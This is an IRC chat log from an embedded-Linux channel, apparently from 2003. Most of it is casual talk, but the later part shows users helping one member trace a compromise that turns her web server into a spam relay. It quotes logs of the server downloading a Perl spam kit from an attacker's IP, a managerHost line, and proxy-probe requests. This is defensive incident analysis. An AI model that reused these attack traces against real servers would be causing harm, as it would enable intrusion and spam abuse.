00:08.22 | *** part/#elinux Rocinante ([5+adKfX28@12-254-194-122.client.attbi.com) |
00:08.27 | *** join/#elinux TomW (tom@24.229.147.16) |
00:10.19 | sjhill | hi TomW |
00:10.37 | TomW | Good morning |
00:10.40 | sjhill | sorphin: wake up boy |
00:11.01 | sjhill | TomW: you old people don't keep track of time well do you? |
00:11.05 | sjhill | :) |
00:11.07 | TomW | I have been neck deep in 8051 code lately. :/ |
00:11.11 | sjhill | ah |
00:11.25 | sjhill | you have my condolences |
00:11.50 | TomW | I do cross development on GNU C, debug it with gdb, then shove it into the controller for final testing. |
00:13.28 | TomW | I have the dosemu loaded so I can run the old dos based C compiler / assembler. My make file system modifies the autoexec.bat of the dosemu, then invokes dosemu, dosemu builds the stuff then exits. Pretty slick setup! |
00:14.39 | TomW | sjhill: I can use the linux command line utils to grep, cut, etc.. Also use the GNU make & perl to manage the whole process, and finally, use cvs to keep track of the changes. |
00:14.59 | TomW | sjhill: what's up? |
00:16.34 | sjhill | TomW: nothing, just trying to get things wrapped up before i leave for my new job this weekend...moving to pittsburgh |
00:17.58 | TomW | cool! You going to do some of the linux stuff I see advertised in the want ads? |
00:20.43 | CosmicPenguin | TomW: you see Linux stuff advertised in want ads? |
00:21.50 | sjhill | TomW: i'm going to work for TimeSys to do hard real-time embedded linux....maybe real-time java eventually if they want me to |
00:22.34 | CosmicPenguin | real time Java? I understand those words, but do they go together? |
00:22.58 | Lethal | ew. rt java. ew. |
00:23.37 | Lethal | talk about having too much free time |
00:24.00 | TomW | CosmicPenguin: up at dice.com. There is some embedded stuff going on in Pittsburgh, Pa. |
00:24.35 | TomW | sjhill: yeah, I've seen the ads on dice.com for that Timesys company. |
00:25.20 | TomW | sjhill: I wonder how you got a job there? Didn't they want a "linux guru", somebody like Alan Cox? |
00:25.23 | TomW | sjhill: heh |
00:26.25 | CosmicPenguin | TomW: sjhill probably falls in that category |
00:26.51 | TomW | ok, just couldn't resist saying that! :-D |
00:30.00 | sjhill | heh |
00:30.28 | sjhill | TomW: the interview process was a bit tough, but they hired Lethal which means they'll take about anyone |
00:30.35 | sjhill | heh |
00:30.41 | TomW | LOL! |
00:31.07 | TomW | Really desperate for talent, eh? Sounds like my kind of situation! |
00:31.34 | Lethal | sjhill, erm. don't make me kick your ass. |
00:32.35 | Lethal | sjhill, manas might not even be in on the monday you start, so you might get lucky ;P |
00:34.31 | sjhill | Lethal: why, would he inundate me with stuff? |
00:35.40 | Lethal | sjhill, doubt it. we already hired someone to attempt to make gdb not suck, so there's like 90% of the company engineering effort out the window :P |
00:36.36 | sjhill | heh |
00:39.57 | TimRiker | how many are they hiring? do you have to be local? |
00:40.24 | Lethal | still hiring selectively, and yes, unfortunately you have to be local :P |
00:40.44 | TimRiker | silicon valley, yes? /me does not care to move there. |
00:40.58 | Lethal | no, pittsburgh, pa. |
00:41.02 | Lethal | I liked silicon valley considerably more. |
00:41.20 | Tangent | Hooray.. I have debian via nfs running on my tuxscreen and am sshing in :)... |
00:41.26 | Tangent | Now time for some swapspace... |
00:41.37 | TimRiker | ah. that's different. I'd consider pittsburgh. got relatives in NY and philly. |
00:41.50 | Lethal | ah |
00:42.02 | Lethal | well, at least the cost of living here is cheap :P |
00:42.27 | TimRiker | yeah, that's the main reason I avoid silicon valley positions. |
00:42.41 | TimRiker | cost of living is 214% what it is here. |
00:42.48 | Lethal | silicon valley positions are great if you can work remotely ;P |
00:43.39 | CosmicPenguin | TimRiker: can't get much cheaper than SLC, unless you live in podunk texas |
00:44.06 | TimRiker | looks like pittsburgh is 7% higher than Provo/Orem |
00:44.33 | Lethal | yeah, but whats there to do in slc? :P |
00:44.42 | CosmicPenguin | Lethal: you would be surprised |
00:44.44 | sorphin | ibot: cluebat sjhill |
00:44.45 | | ACTION pulls out a ClueBat (tm) and thwaps sjhill. |
00:44.47 | TimRiker | Lethal: well then they aren't silicon valley positions are they? ;-) |
00:45.28 | Lethal | not enough people hiring these days |
00:46.20 | TimRiker | outskirts like "Plum" ... (where's that?) are actually cheaper than here. wow. |
00:47.12 | Lethal | plum isn't far from here. most places are really just suburbs. |
00:47.12 | Lethal | I'm in monroeville. |
00:47.19 | Lethal | its pretty cheap here |
00:47.22 | TimRiker | well, pass on a resume if they are interested http://rikers.org/resume.htm I'm off to dinner. flying to dallas for an interview this weekend. |
00:48.00 | TimRiker | monroeville shows +1.5% from here. not bad. |
00:51.52 | TomW | Lethal: one of the reasons I moved to Pa 15 years ago, I could afford to live here! |
00:53.55 | Tangent | Has anyone got an nbd module for strongarm ? |
00:54.06 | Lethal | TomW, heh |
00:54.09 | Tangent | 2.4.18-rmk6-tux1 |
00:54.32 | TomW | Tangent: didn't 2.4.18 have some bugs in it? |
00:54.33 | Lethal | TomW, I moved here from san jose, so the housing costs were a nice surprise ;P |
00:54.43 | Tangent | TomW: No idea... I'm obsolete |
00:55.16 | Tangent | If I can make swap work, I'll build a new kernel for it |
00:55.32 | TomW | Lethal: WHEW! Yeah, I know about the housing costs around San Jose. I stayed in Santa Cruz about 30 years ago and San Jose was big-time expensive back then! |
00:56.19 | TomW | Tangent: they are telling the mainstream linux users to upgrade to 2.4.19 because of some problem. |
00:56.35 | Lethal | santa cruz is cool, I had some friends there, the commute just sucked :P |
00:57.10 | Tangent | TomW: 6 months ago I upgraded to 2.4.18.. and today I got around to booting it..... That's why I'm reluctant to upgrade the kernel today... |
00:57.23 | Tangent | It'll just be a whole new load of hassles |
00:57.51 | Lethal | wow, I hate our mail system. I get one piece of spam, and then I get an automated mail from IT telling me I have spam. |
00:57.52 | Lethal | wtf. |
00:58.13 | kergoth | spammed by IT. what else is new |
00:58.14 | Tangent | What a sweet system :_ |
00:58.41 | Tangent | I get two bounce messages delivered to me for every piece of spam that fails to get delivered to non-existent users |
00:58.54 | Lethal | kergoth, it's not so bad in small volume. but I just got half a dozen of them. most irritating. |
00:59.11 | Lethal | not to mention, I don't need another piece of spam relaying the fact I have mail. |
00:59.41 | Lethal | they need to limit this behavior to outlook folk. |
00:59.53 | Lethal | they should be quarantined anyways. |
01:08.15 | Tangent | My mail goes through realtime blackhole list + amavis + sanitizer + spamassassin |
01:08.46 | Tangent | There's still about 2 a month that make it to the inbox tho' |
01:08.52 | Lethal | I usually just filter out marketing + *@gnu.org to /dev/null and it cuts out about 90% of my spam |
01:15.30 | Tangent | ibot tuxscreen kernel |
01:15.31 | | no idea, Tangent |
01:15.39 | Tangent | ibot tuxscreen patches |
01:15.40 | | Tangent: parse error: dunno what the heck you're talking about |
01:41.24 | Tangent | Is there not some convenient stash of pre-built kernels and modules for the tux? |
01:47.29 | TomW | Tangent: to go back in version or up in version? |
01:48.00 | Tangent | TomW: Either |
01:48.18 | Tangent | TomW: either NBD modules for 2.4.18, or whole new kernel + nbd modules |
01:50.18 | TomW | for the basic ARM stuff, goto ftp://ftp.arm.linux.org.uk/pub/armlinux/source/kernel-patches/v2.4 |
01:52.51 | TomW | Tangent: check out: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/tuxscreen/buildroot-tux/make/linux.mk |
01:53.12 | TomW | Tangent: Erik checked in the rmk-2.4.19 patches less than a day ago. |
02:08.25 | Tangent | TomW: I've got buildroot going already... It's just that it takes _ages_ |
02:08.48 | Tangent | Anyhow.. I'm off to bed... |
02:08.49 | Tangent | Night all |
02:09.57 | jacques_gone | hi |
02:10.12 | jacques | i was at surpluscomputers again on sunday |
02:10.18 | jacques | they have webpals again |
02:10.27 | jacques | $12.95 |
02:10.38 | jacques | $7.95 if you dont want the modem! |
02:16.21 | TomW | jacques: hello |
02:17.06 | TomW | jacques: really! Guess you'll have to go to a computer show and purchase some old ISA stuff, eh? |
02:17.55 | jacques | TomW: you mean to replace the modem? |
02:18.03 | jacques | does the webpal have an isa slot? |
02:20.46 | TomW | jacques: yes, a limited one. Only has a single IRQ line for it. |
02:24.03 | TomW | jacques: a good site for the webpal is at: http://www.geocities.com/webpalstuff/ |
02:24.47 | TomW | jacques: he does have a complete set of schematics, but they are in Eagle CAD. You will have to download the freebie Eagle from: http://www.cadsoft.de |
02:25.14 | TomW | jacques: he did an excellent job of doing the schematics, really professional job! |
02:47.18 | jacques | cool |
02:50.55 | MonMotha | there are PDFs of the schematics up if you don't have eagle and are too lazy to install it (like me) |
03:05.40 | *** join/#elinux scanline (~micah@aden2-42-dhcp.resnet.Colorado.EDU) |
03:14.57 | sorphin | scanline: heh, on ebay, all episodes of MacGyver, heh |
03:15.06 | scanline | hehe |
03:15.36 | sorphin | scanline: the vcd ones are pricey as hell, someone has cheaper vhs in good shape (a few fulls) |
03:46.25 | CosmicPenguin | Damn turbotax site just went down |
03:50.22 | andersee | CosmicPenguin: speaking of taxes... did you get that 1099 form? |
04:01.38 | CosmicPenguin | andersee: yeah... :) |
04:01.48 | CosmicPenguin | andersee: owe the gomment some money, I guess |
04:08.10 | *** join/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com) |
04:08.31 | Rocinante | CosmicPenguin: I'll catch up with you in the morning...Things came up |
04:19.44 | *** part/#elinux Rocinante ([4W6ugZwlz@12-254-194-122.client.attbi.com) |
05:28.17 | *** join/#elinux ChanServ (ChanServ@services.) |
05:28.17 | *** mode/#eLinux [+o ChanServ] by calvino.freenode.net |
12:45.57 | *** join/#elinux mallum (~mallum@pc-80-193-218-21-hw.blueyonder.co.uk) |
14:42.02 | *** join/#elinux GPSFan (~kenm@65.114.238.130) |
14:52.20 | *** join/#elinux Rocinante ([MFzRVPw2O@12-254-194-122.client.attbi.com) |
15:09.20 | CosmicPenguin | Morning folks |
15:22.40 | *** join/#elinux prpplague (~JoeBob1@12.148.134.9) |
15:22.40 | *** mode/#eLinux [+o prpplague] by ChanServ |
15:23.48 | sorphin | CosmicPenguin: lo |
15:23.52 | sorphin | prpplague: morning dave |
15:23.57 | prpplague | sorphin: hey |
15:24.07 | prpplague | whats up today guys? |
15:24.13 | CosmicPenguin | señor POS! |
15:24.37 | prpplague | si |
15:24.56 | sorphin | prpplague: when i said yesterday i was getting prpplague type gear on ebay, i meant POS stuff ;) (specifically still trying to get a mag stripe reader i don't have to try and run through the fscking game port or shiz) |
15:25.36 | sorphin | heh |
15:25.37 | sorphin | Comdex Operators File for Bankruptcy |
15:25.49 | sorphin | good thing i've never even been to it ;p |
15:26.33 | prpplague | sorphin: ahh |
15:27.07 | sorphin | one thing i hate about ebay sometimes.. something's 4 DAYS out |
15:27.11 | sorphin | and someone bids :P |
15:27.23 | sorphin | like it's ending tomorrow or something ;p |
15:27.50 | CosmicPenguin | sorphin: newbies |
15:28.01 | sorphin | annoyances is more like |
15:28.29 | sorphin | CosmicPenguin: so since they made you stay, when can we expect pixil? ;) |
15:30.24 | CosmicPenguin | sorphin: check the address on my name - I am no longer an employee of Century Software |
15:30.58 | prpplague | CosmicPenguin: ? |
15:31.03 | prpplague | CosmicPenguin: you get axed? |
15:31.35 | CosmicPenguin | prpplague: yep |
15:34.08 | prpplague | CosmicPenguin: damm |
15:34.16 | prpplague | CosmicPenguin: overnight? |
15:39.00 | CosmicPenguin | prpplague: yesterday some time |
15:39.17 | prpplague | CosmicPenguin: man |
15:39.29 | prpplague | CosmicPenguin: so is it just greg now? |
15:39.38 | CosmicPenguin | prpplague: as far as engineers? |
15:39.49 | CosmicPenguin | prpplague: my old supervisor Jason is still there, they are the programmers |
15:40.11 | CosmicPenguin | prpplague: anyway, I was given a month of consulting to finish up Pixil |
15:40.31 | prpplague | CosmicPenguin: at least that's something |
15:49.10 | sorphin | CosmicPenguin: layoff or fire ? |
15:49.37 | prpplague | sorphin: fired, he got caught with too much pr0n on the company server :) |
15:49.46 | sorphin | prpplague: sound about right ;) |
15:49.50 | sorphin | +s |
15:52.50 | CosmicPenguin | sorphin: so what you are saying is that I *shouldn't* have mooned the CEO? |
15:54.19 | sorphin | CosmicPenguin: right |
15:55.24 | prpplague | CosmicPenguin: did you beat yourself up like on fightclub? |
15:55.56 | CosmicPenguin | prpplague: no, but that's a good thought for next time... :) |
15:56.39 | *** join/#elinux sieve (~sieve@12.148.134.9) |
15:57.14 | sieve | morning |
15:57.19 | sorphin | speaking of people that need to be removed from employment, that shipping chick at abcsinc needs to be ;p |
15:57.22 | prpplague | sieve: you get that memo about your tps reports? |
15:58.01 | Rocinante | signal11: Thanks for setting up the forwarding |
15:58.03 | prpplague | sorphin: lol, which reminds me, i need to get down there and get you guys stuff shipped |
15:58.13 | signal11 | Rocinante: any time |
15:58.22 | CosmicPenguin | signal11: do me a huge favor? |
15:58.27 | signal11 | CosmicPenguin: sure |
15:58.36 | CosmicPenguin | go to cosmic and turn on the ssh server? |
15:59.19 | sorphin | CosmicPenguin: are you doing an sjhill? ;) |
15:59.25 | CosmicPenguin | sorphin: ?? |
15:59.41 | sorphin | l33ching from the company before you go ;) |
16:00.14 | CosmicPenguin | sorphin: well, I am still technically a consultant - and I spent about 2 weeks getting my FVWM settings right, and I really don't want to do that again |
16:00.27 | sorphin | hehe |
16:00.46 | sorphin | haven't used fvwm in years ;) |
16:03.05 | kergoth | hey |
16:03.19 | sorphin | lo digichris |
16:03.49 | prpplague | kergoth: the fun with netsilicon continues, had 3 voicemails this morning |
16:03.49 | kergoth | man, putting my name and digi in the same word is just _mean_ :) |
16:04.02 | kergoth | prpplague: damn, insistent bastards arent they |
16:04.09 | prpplague | kergoth: no kidding |
16:04.33 | prpplague | kergoth: "if you come to the training session you could win a free digi-connect!" |
16:04.34 | sorphin | kergoth: hey, you're the one that works for em ;p |
16:04.58 | kergoth | prpplague: oh wow! you better sign up for that! :P |
16:06.02 | *** join/#elinux Morn (~julie@ultrasparc.ipv6.magenet.com) |
16:06.17 | Morn | bloody hell |
16:06.51 | sorphin | Morn: ? |
16:07.28 | prpplague | Morn: not destroying cell phones this morning are you? |
16:07.34 | Morn | some joker keeps trying to use my web server to launch a spam attack |
16:07.43 | sorphin | Morn: been there, seen that |
16:07.44 | Morn | prpplague: no, I lost my cell phone in a NYC cab yesterday |
16:07.50 | sorphin | Morn: you should see my web logs :P |
16:07.53 | sorphin | Morn: doh |
16:07.57 | Morn | sorphin: do you know how it works? |
16:08.05 | Morn | I can't find the hole they are using |
16:08.13 | Morn | they are uploading a perl script |
16:08.22 | SmithMatt | paste in some of your logs |
16:08.23 | sorphin | formmail.pl ? |
16:08.29 | sorphin | or such |
16:08.34 | Morn | I see them TRYING to use that, but this is different |
16:08.35 | sorphin | that's an old one |
16:08.50 | sorphin | they're not trying to upload it |
16:08.52 | sorphin | they're trying to USE it |
16:08.59 | Morn | flood alert |
16:09.04 | Morn | HTTP request sent, awaiting response... 200 OK |
16:09.05 | Morn | Length: 10,170 [application/x-tar] |
16:09.05 | Morn | <PROTECTED> |
16:09.05 | Morn | 02:27:03 (18.09 KB/s) - `/tmp/af56j/archive.tgz' saved [10170/10170] |
16:09.05 | Morn | tar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future |
16:09.05 | Morn | gzip: stdin: unexpected end of file |
16:09.07 | Morn | tar: Child returned status 1 |
16:09.09 | Morn | tar: Error exit delayed from previous errors |
16:09.11 | Morn | tar: guestbook.cgi: time stamp 2003-02-04 02:28:27 is 84 s in the future |
16:09.13 | Morn | sh: line 1: /usr/bin/telnet: Permission denied |
16:09.18 | Morn | that's in the /var/log/httpd/error_log |
16:09.20 | sorphin | ummm |
16:09.30 | sorphin | cute |
16:09.38 | Morn | And I see that they are trying to use gcc and and stuff |
16:09.46 | Morn | but I locked down the compilers and the network tools |
16:09.53 | sorphin | you have a hole in your apache |
16:10.00 | sorphin | or that guestbook cgi |
16:10.05 | Morn | no shit |
16:10.08 | SmithMatt | totally.. they're already running stuff... they just haven't run the bomb yet. |
16:10.10 | Morn | no, they are uploading guestbook.cgi |
16:10.17 | sorphin | uhh |
16:10.35 | Morn | guestbook.cgi sets off a major spam attack |
16:10.39 | sorphin | don't allow POST :P |
16:10.47 | Morn | starts like 70 processes spamming |
16:10.54 | SmithMatt | a good place to start would be to kill apache... |
16:11.00 | Morn | I can't kill apache |
16:11.05 | sorphin | upgrade apache, disable POST |
16:11.11 | Morn | I run a business that requires apache |
16:11.15 | Morn | and I can't just turn off POST |
16:11.20 | sorphin | uhh |
16:11.20 | Morn | all the web forms would stop working |
16:11.23 | SmithMatt | you're running a spam business right now... pick one. |
16:11.27 | sorphin | then *restrict* it :P |
16:11.28 | Morn | my clients would shit |
16:11.35 | SmithMatt | what apache version? |
16:11.35 | Morn | I actually stopped the spam thing |
16:11.58 | Morn | it creates a dir in tmp named a56j or something; I set the permissions unwritable for that dir |
16:12.05 | Morn | so it can't untar the spam attack |
16:12.21 | sorphin | heh |
16:12.22 | Morn | apache-1.3.26-6.1mdk |
16:12.41 | sorphin | this is why i make my webserver unusable to outsiders ;) |
16:12.44 | Morn | I have the latest security updates from Mandrake |
16:12.54 | Morn | sorphin: I have paying web clients |
16:13.00 | sorphin | Morn: that's not what i mean |
16:13.00 | sorphin | :P |
16:13.02 | Morn | the whole point is so outside users can use it |
16:13.10 | sorphin | you misread what i say :P |
16:13.33 | Morn | I'm trying to figure out how they are uploading the file |
16:13.38 | Morn | and as of yet I don't see it |
16:13.41 | sorphin | uhh |
16:13.46 | sorphin | post prolly :P |
16:13.47 | Morn | it doesn't appear to be a bad cgi script |
16:14.05 | sorphin | it'd be in access_log prolly |
16:14.06 | Morn | I don't see any POSTs in the logs that would indicate this |
16:14.14 | Morn | I did a grep on all posts |
16:14.17 | sorphin | well, a GET can't push a file |
16:14.24 | sorphin | to the server |
16:15.07 | Morn | www.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.pl HTTP/1.1" 404 317 |
16:15.11 | Morn | www.magenet.com-access_log:ns2a.nlenet.net - - [03/Feb/2003:07:44:43 -0500] "POST /cgi-bin/formmail.cgi HTTP/1.1" 404 318 |
16:15.11 | Morn | there are tons of those |
16:15.15 | sorphin | yup |
16:15.24 | Morn | but they are all 404 |
16:15.28 | sorphin | that's the old one i was talking about |
16:15.36 | Morn | I don't see any successful POSTs that would result in this |
16:15.43 | sorphin | timestamp match against the error log :P |
16:15.55 | Morn | I tried that |
16:16.04 | sorphin | send me your logs, julie |
16:16.12 | Morn | the FormMail requests happen very CLOSE to the other |
16:16.29 | Morn | I saw |
16:16.38 | Morn | I can't do that easily |
16:16.51 | Morn | My logs are HUGE and there are many of them |
16:16.56 | sorphin | umm |
16:17.05 | sorphin | i only need the logs that have that time frame in them ;p |
16:17.06 | Morn | I have 60 different web hosts running |
16:17.37 | sorphin | that's nice.. i only need the applicable access/error logs from the "host" that was attacked |
16:17.50 | Morn | what address? |
16:18.05 | Morn | email address that is |
16:18.17 | sorphin | that one |
17:10.49 | sorphin | Morn: heh, ironic that yesterday there was a story on /. about cgi-shell, and you have a cgi exploit goin on ;p |
17:16.49 | Morn | Is it possible to use a PUT to do this? |
17:17.11 | sorphin | might be, forgot if there is a put |
17:17.37 | Morn | I'm not sure it is CGI related |
17:17.39 | Morn | right now I just have no idea what the deal is |
17:18.11 | sorphin | heh |
17:18.12 | sorphin | POST http://127.0.0.1:25/ |
17:18.15 | sorphin | you get some fun ones |
17:18.17 | sorphin | i'll say that ;p |
17:18.29 | Morn | yeah, all kinds of weird stuff in there |
17:18.35 | sorphin | CONNECT http://127.0.0.1:25/ |
17:18.42 | sorphin | i see people try and use my webserver as a proxy |
17:20.30 | sorphin | Morn: your access log doesn't go back far enough |
17:20.39 | sorphin | this is from the 3rd, the exploit was on the 1st |
17:20.55 | Morn | the exploit happened again on the 3rd |
17:21.00 | Morn | around 6am |
17:21.08 | Morn | that's why I put the 3rd in there |
17:21.16 | sorphin | sheesh |
17:21.23 | sorphin | it happened a LOT |
17:21.26 | Morn | no shit |
17:21.32 | Morn | that's why I'm worried |
17:21.46 | Morn | I can't see how it's happening |
17:21.54 | Morn | this is like driving blind |
17:22.10 | sorphin | lemme pull the archive they're using |
17:22.21 | Morn | I tried to find it on google |
17:22.25 | Morn | I didn't have any luck |
17:22.39 | Morn | I was trying to find something on how to do this |
17:22.44 | Morn | so I could plug it |
17:23.04 | sorphin | haha |
17:23.10 | sorphin | you're being attacked from russia :P |
17:23.18 | Morn | oh? |
17:23.28 | sorphin | yeah |
17:23.33 | sorphin | whois on this IP :P |
17:23.34 | sorphin | 217.106.122.58 |
17:23.43 | sorphin | descr: Stack Ltd. |
17:23.43 | sorphin | descr: Russia, Siberia, Tomsk |
17:24.32 | sorphin | eww.. use use suexec ? |
17:24.37 | sorphin | you even |
17:24.47 | Morn | it's part of the default install |
17:24.51 | Morn | I had plans to use it |
17:24.57 | Morn | but I never did that project |
17:24.59 | sorphin | until you intend to do so |
17:25.02 | sorphin | i'd turn it off |
17:25.03 | sorphin | :P |
17:28.50 | *** join/#elinux TimRiker (timr@rikers.org) |
17:28.51 | *** mode/#eLinux [+o TimRiker] by ChanServ |
17:29.01 | sorphin | TimRiker: hola |
17:29.35 | TimRiker | hola. como estas? |
17:29.40 | sorphin | eh.. |
17:29.59 | sorphin | TimRiker: trying to help Morn find how someone's getting this exploit through her webserver |
17:30.17 | sorphin | the logs show no PUT/POST |
17:30.22 | TimRiker | ooh.. sploits |
17:30.25 | sorphin | yup |
17:31.21 | sorphin | TimRiker: this look familiar? (incoming flood) |
17:31.23 | sorphin | which: no fetch in (/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin) |
17:31.24 | sorphin | guestbook.cgi: no process killed |
17:31.24 | sorphin | perl: no process killed |
17:31.24 | sorphin | sh: line 1: fetch: command not found |
17:31.24 | sorphin | --05:15:48-- http://217.106.122.58/archive.tgz |
17:31.26 | sorphin | <PROTECTED> |
17:31.28 | sorphin | Connecting to 217.106.122.58:80... connected. |
17:31.30 | sorphin | HTTP request sent, awaiting response... 200 OK |
17:31.32 | sorphin | Length: 92,695 [application/x-tar] |
17:31.34 | sorphin | <PROTECTED> |
17:31.36 | sorphin | <PROTECTED> |
17:31.38 | sorphin | 05:15:49 (72.19 KB/s) - `/tmp/af56j/archive.tgz' saved [92695/92695] |
17:31.40 | sorphin | tar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future |
17:31.42 | sorphin | gzip: stdin: unexpected end of file |
17:31.44 | sorphin | tar: Child returned status 1 |
17:31.46 | sorphin | tar: Error exit delayed from previous errors |
17:31.48 | sorphin | tar: guestbook.cgi: time stamp 2003-02-01 05:18:13 is 144 s in the future |
17:31.50 | sorphin | ls: /tmp/af56j/guestbook.cgi: No such file or directory |
17:32.00 | sorphin | the technique that is |
17:32.36 | sorphin | it appears to be a perl script w/ some perl modules, can't figure how they're stuffing it through.. i got sploited via DNS ages ago, but that was fixed w/ an upgrade |
17:33.09 | sorphin | ooh |
17:33.18 | sorphin | someone was definitely bored (as i look at this script) |
17:33.23 | Morn | as a temp fix I made the permissions on /tmp/af56j 000 |
17:34.16 | Morn | bored? |
17:34.29 | sorphin | yeah, to go through the trouble of writing this crap |
17:34.45 | Morn | the weird thing is it seems to clean up after itself |
17:34.53 | Morn | I mean the original archive.tgz gets erased |
17:34.58 | Morn | whatever it was trying to compile |
17:35.11 | Morn | and I killed the webserver before backing up that dir |
17:35.12 | sorphin | it's all perl |
17:35.22 | sorphin | the guestbook bit |
17:35.22 | Morn | but look, there are attempts to use gcc |
17:35.28 | Morn | which failed |
17:35.46 | Morn | because only the people with permission can run the compilers |
17:35.50 | sorphin | not in the archive.tgz there aren't |
17:35.55 | Morn | and apache isn't in that list |
17:35.59 | sorphin | maybe it grabs something else |
17:36.10 | sorphin | but this archive is just a listener |
17:36.10 | Morn | did you find archive.tgz? |
17:36.20 | sorphin | yes |
17:36.27 | sorphin | it's in your logs julie |
17:36.28 | Morn | can you send it to me, or give me a link |
17:36.40 | sorphin | --07:33:57-- http://217.106.122.58/archive.tgz |
17:36.44 | sorphin | right there |
17:36.49 | Morn | doh! |
17:36.52 | sorphin | ;) |
17:36.54 | Morn | I'm an idiot |
17:36.58 | sorphin | :) |
17:38.43 | Morn | it couldn't use telnet either |
17:38.49 | sorphin | hehe |
17:38.49 | Morn | you have to be in the ntools group for that |
17:38.57 | sorphin | rotfl |
17:39.05 | sorphin | </anal> |
17:39.22 | Morn | ? |
17:39.26 | sorphin | you |
17:39.34 | sorphin | everything in its own lil groups |
17:39.46 | Morn | This could have been worse if I hadn't done that |
17:39.51 | sorphin | true |
17:39.57 | sorphin | i never get to that point tho |
17:40.21 | sorphin | the webserver does nothing but webserve |
17:40.58 | sorphin | but everything is controlled |
17:41.02 | Morn | my server is multifunctional |
17:41.12 | Morn | since it is a shell server too |
17:41.18 | sorphin | heh |
17:41.22 | sorphin | diff box for that :P |
17:41.25 | Morn | which is part of the reason for the multiple group settings |
17:41.34 | Morn | 500 users can get out of control |
17:41.40 | sorphin | uhhhh |
17:41.45 | sorphin | you're nuts ;) |
17:42.01 | Morn | my doctor would agree (giggle) |
17:42.08 | sorphin | i'm sure :P |
17:42.24 | Morn | he seems happy with the dvd I converted for him though |
17:42.37 | Morn | but he really didn't understand a word I babbled about how I did it |
17:42.41 | sorphin | hehe |
17:42.52 | sorphin | still not sure about my dvd2one probs |
17:43.07 | Morn | his was the PAL->NTSC conversion |
17:43.12 | Morn | I think it came out very nice |
17:43.20 | sorphin | how'd you do it ? |
17:43.57 | Morn | the actual conversion I used tmpgenc+ for |
17:44.10 | Morn | but I did a lot of work to get the subtitles right |
17:44.15 | Morn | and keep the audio in sync |
17:44.24 | sorphin | nod |
17:44.35 | Morn | it takes tmpgenc a LONG time to do a PAL->NTSC conversion |
17:44.40 | sorphin | julie |
17:44.44 | Morn | 6.5 hours on my box for 1.5 hours of video |
17:44.52 | sorphin | it takes tmpgenc a long time to do ANYTHING :P |
17:46.14 | Morn | If I block that IP it'll help right? |
17:46.16 | sorphin | man this "sploit" as tim calls them, is humorous |
17:46.29 | Morn | that way the script can't contact the 'managerHost' and get info |
17:46.31 | sorphin | it'll prevent them from pulling that file, yes |
17:46.45 | sorphin | and if the whole thing is coming from that IP |
17:46.52 | sorphin | you'll block that too |
17:46.56 | Morn | well, it contacts that ip for more than just the file |
17:47.18 | sorphin | that's the stuff i want to see ;) |
17:47.19 | Morn | my $managerHost="217.106.122.58"; |
17:47.23 | sorphin | i know |
17:47.31 | sorphin | i wish i had a honeypot |
17:47.38 | Morn | ? |
17:47.55 | sorphin | a nice isolated, doesn't matter what happens to it box |
17:48.01 | sorphin | so i can watch this thing at work |
17:48.51 | TimRiker | any idea on user/group ownership for the sploit stuff? |
17:48.53 | TimRiker | does it look like a cgi script issue? |
17:48.57 | TimRiker | you have looked for lame things like perl binaries in the cgi-bin directory etc I presume? |
17:49.35 | sorphin | TimRiker: here's what's in the archive |
17:49.36 | Morn | I don't see any log entries showing how it uploaded the file |
17:49.36 | sorphin | -rwxrwxr-x zas/staff 5704 2003-02-04 01:28:27 guestbook.cgi |
17:49.36 | sorphin | drwxrwxr-x zas/staff 0 2003-02-02 04:03:22 lib/ |
17:49.36 | sorphin | drwxrwxr-x zas/staff 0 2003-02-01 05:29:07 lib/Net/ |
17:49.36 | sorphin | -r--rw-r-- zas/staff 8762 2003-02-03 04:11:16 lib/Net/SMTP.pm |
17:49.36 | sorphin | -r--rw-r-- zas/staff 9703 2003-02-03 04:11:35 lib/Net/Cmd.pm |
17:49.38 | sorphin | -r--rw-r-- zas/staff 3387 2003-02-03 04:11:26 lib/Net/Config.pm |
17:49.40 | sorphin | -rw-r--r-- zas/zas 3771 2003-02-03 04:10:56 lib/ForkManager.pm |
17:49.48 | Morn | just a error message that it was uploaded |
17:49.49 | sorphin | we can't figure how it's sneaking the file in tho |
17:50.12 | Morn | there's nothing relevant in the logs other than the formmail searches around the times it happens |
17:50.33 | Morn | and that guestbook.cgi forks off a lot of processes |
17:50.39 | Morn | I came home to a load of 30 |
17:50.45 | TimRiker | who is the zas user? |
17:50.47 | Morn | and 70 processes spamming everyone |
17:51.06 | sorphin | whoever made that archive on the box it gets it from i guess |
17:51.28 | TimRiker | oh, is that a tar directory ? or an ls? |
17:51.29 | sorphin | TimRiker: http://217.106.122.58/archive.tgz |
17:51.37 | sorphin | a tar |
17:51.40 | sorphin | that's where it pulls it from |
17:51.57 | sorphin | something is causing her webserver to fetch that file from that IP |
17:52.16 | Morn | I guess the best thing is to iptables block that ip |
17:52.18 | sorphin | Morn: i suspect suExec tho |
17:52.34 | Morn | hmmm |
17:52.36 | sorphin | cuz i always see [Mon Feb 3 21:20:55 2003] [notice] suEXEC mechanism enabled (wrapper: /usr/sbi |
17:52.39 | sorphin | right before the exploit |
17:52.46 | TimRiker | what cgi scripts are installed on the webserver? |
17:52.54 | sorphin | TimRiker: she has suEXEC running |
17:52.59 | sorphin | TimRiker: which i don't trust |
17:53.00 | Morn | TimRiker: A lot of stuff, I have commercial clients |
17:53.11 | Morn | let me disable suExec |
17:53.18 | TimRiker | and the clients upload their own cgi scripts? |
17:53.38 | TimRiker | I suspect a poorly written cgi script someplace. |
17:53.51 | TimRiker | many of those are easy to exploit. |
17:54.19 | Morn | I have a central cgi-bin for most stuff |
17:54.25 | Morn | but I gave a few clients their own |
17:54.34 | Morn | but with all the stuff it's hard to keep up with it |
17:55.58 | TimRiker | giving folks cgi access is effectively giving them shell access. and if they write bad scripts, then you might be giving the world shell access. |
17:56.20 | Morn | all the users already have shell access |
17:56.24 | Morn | 500 shell users |
17:56.40 | Morn | but only 2 have their own cgi-bin |
17:56.47 | Morn | the rest have to send scripts to me first |
17:57.02 | Morn | I try to encourage the use of php instead of perl scripts |
17:57.17 | Morn | You know I don't see where to turn off suexec |
17:57.22 | *** join/#elinux lossy (~drago@p3EE2FF74.dip.t-dialin.net) |
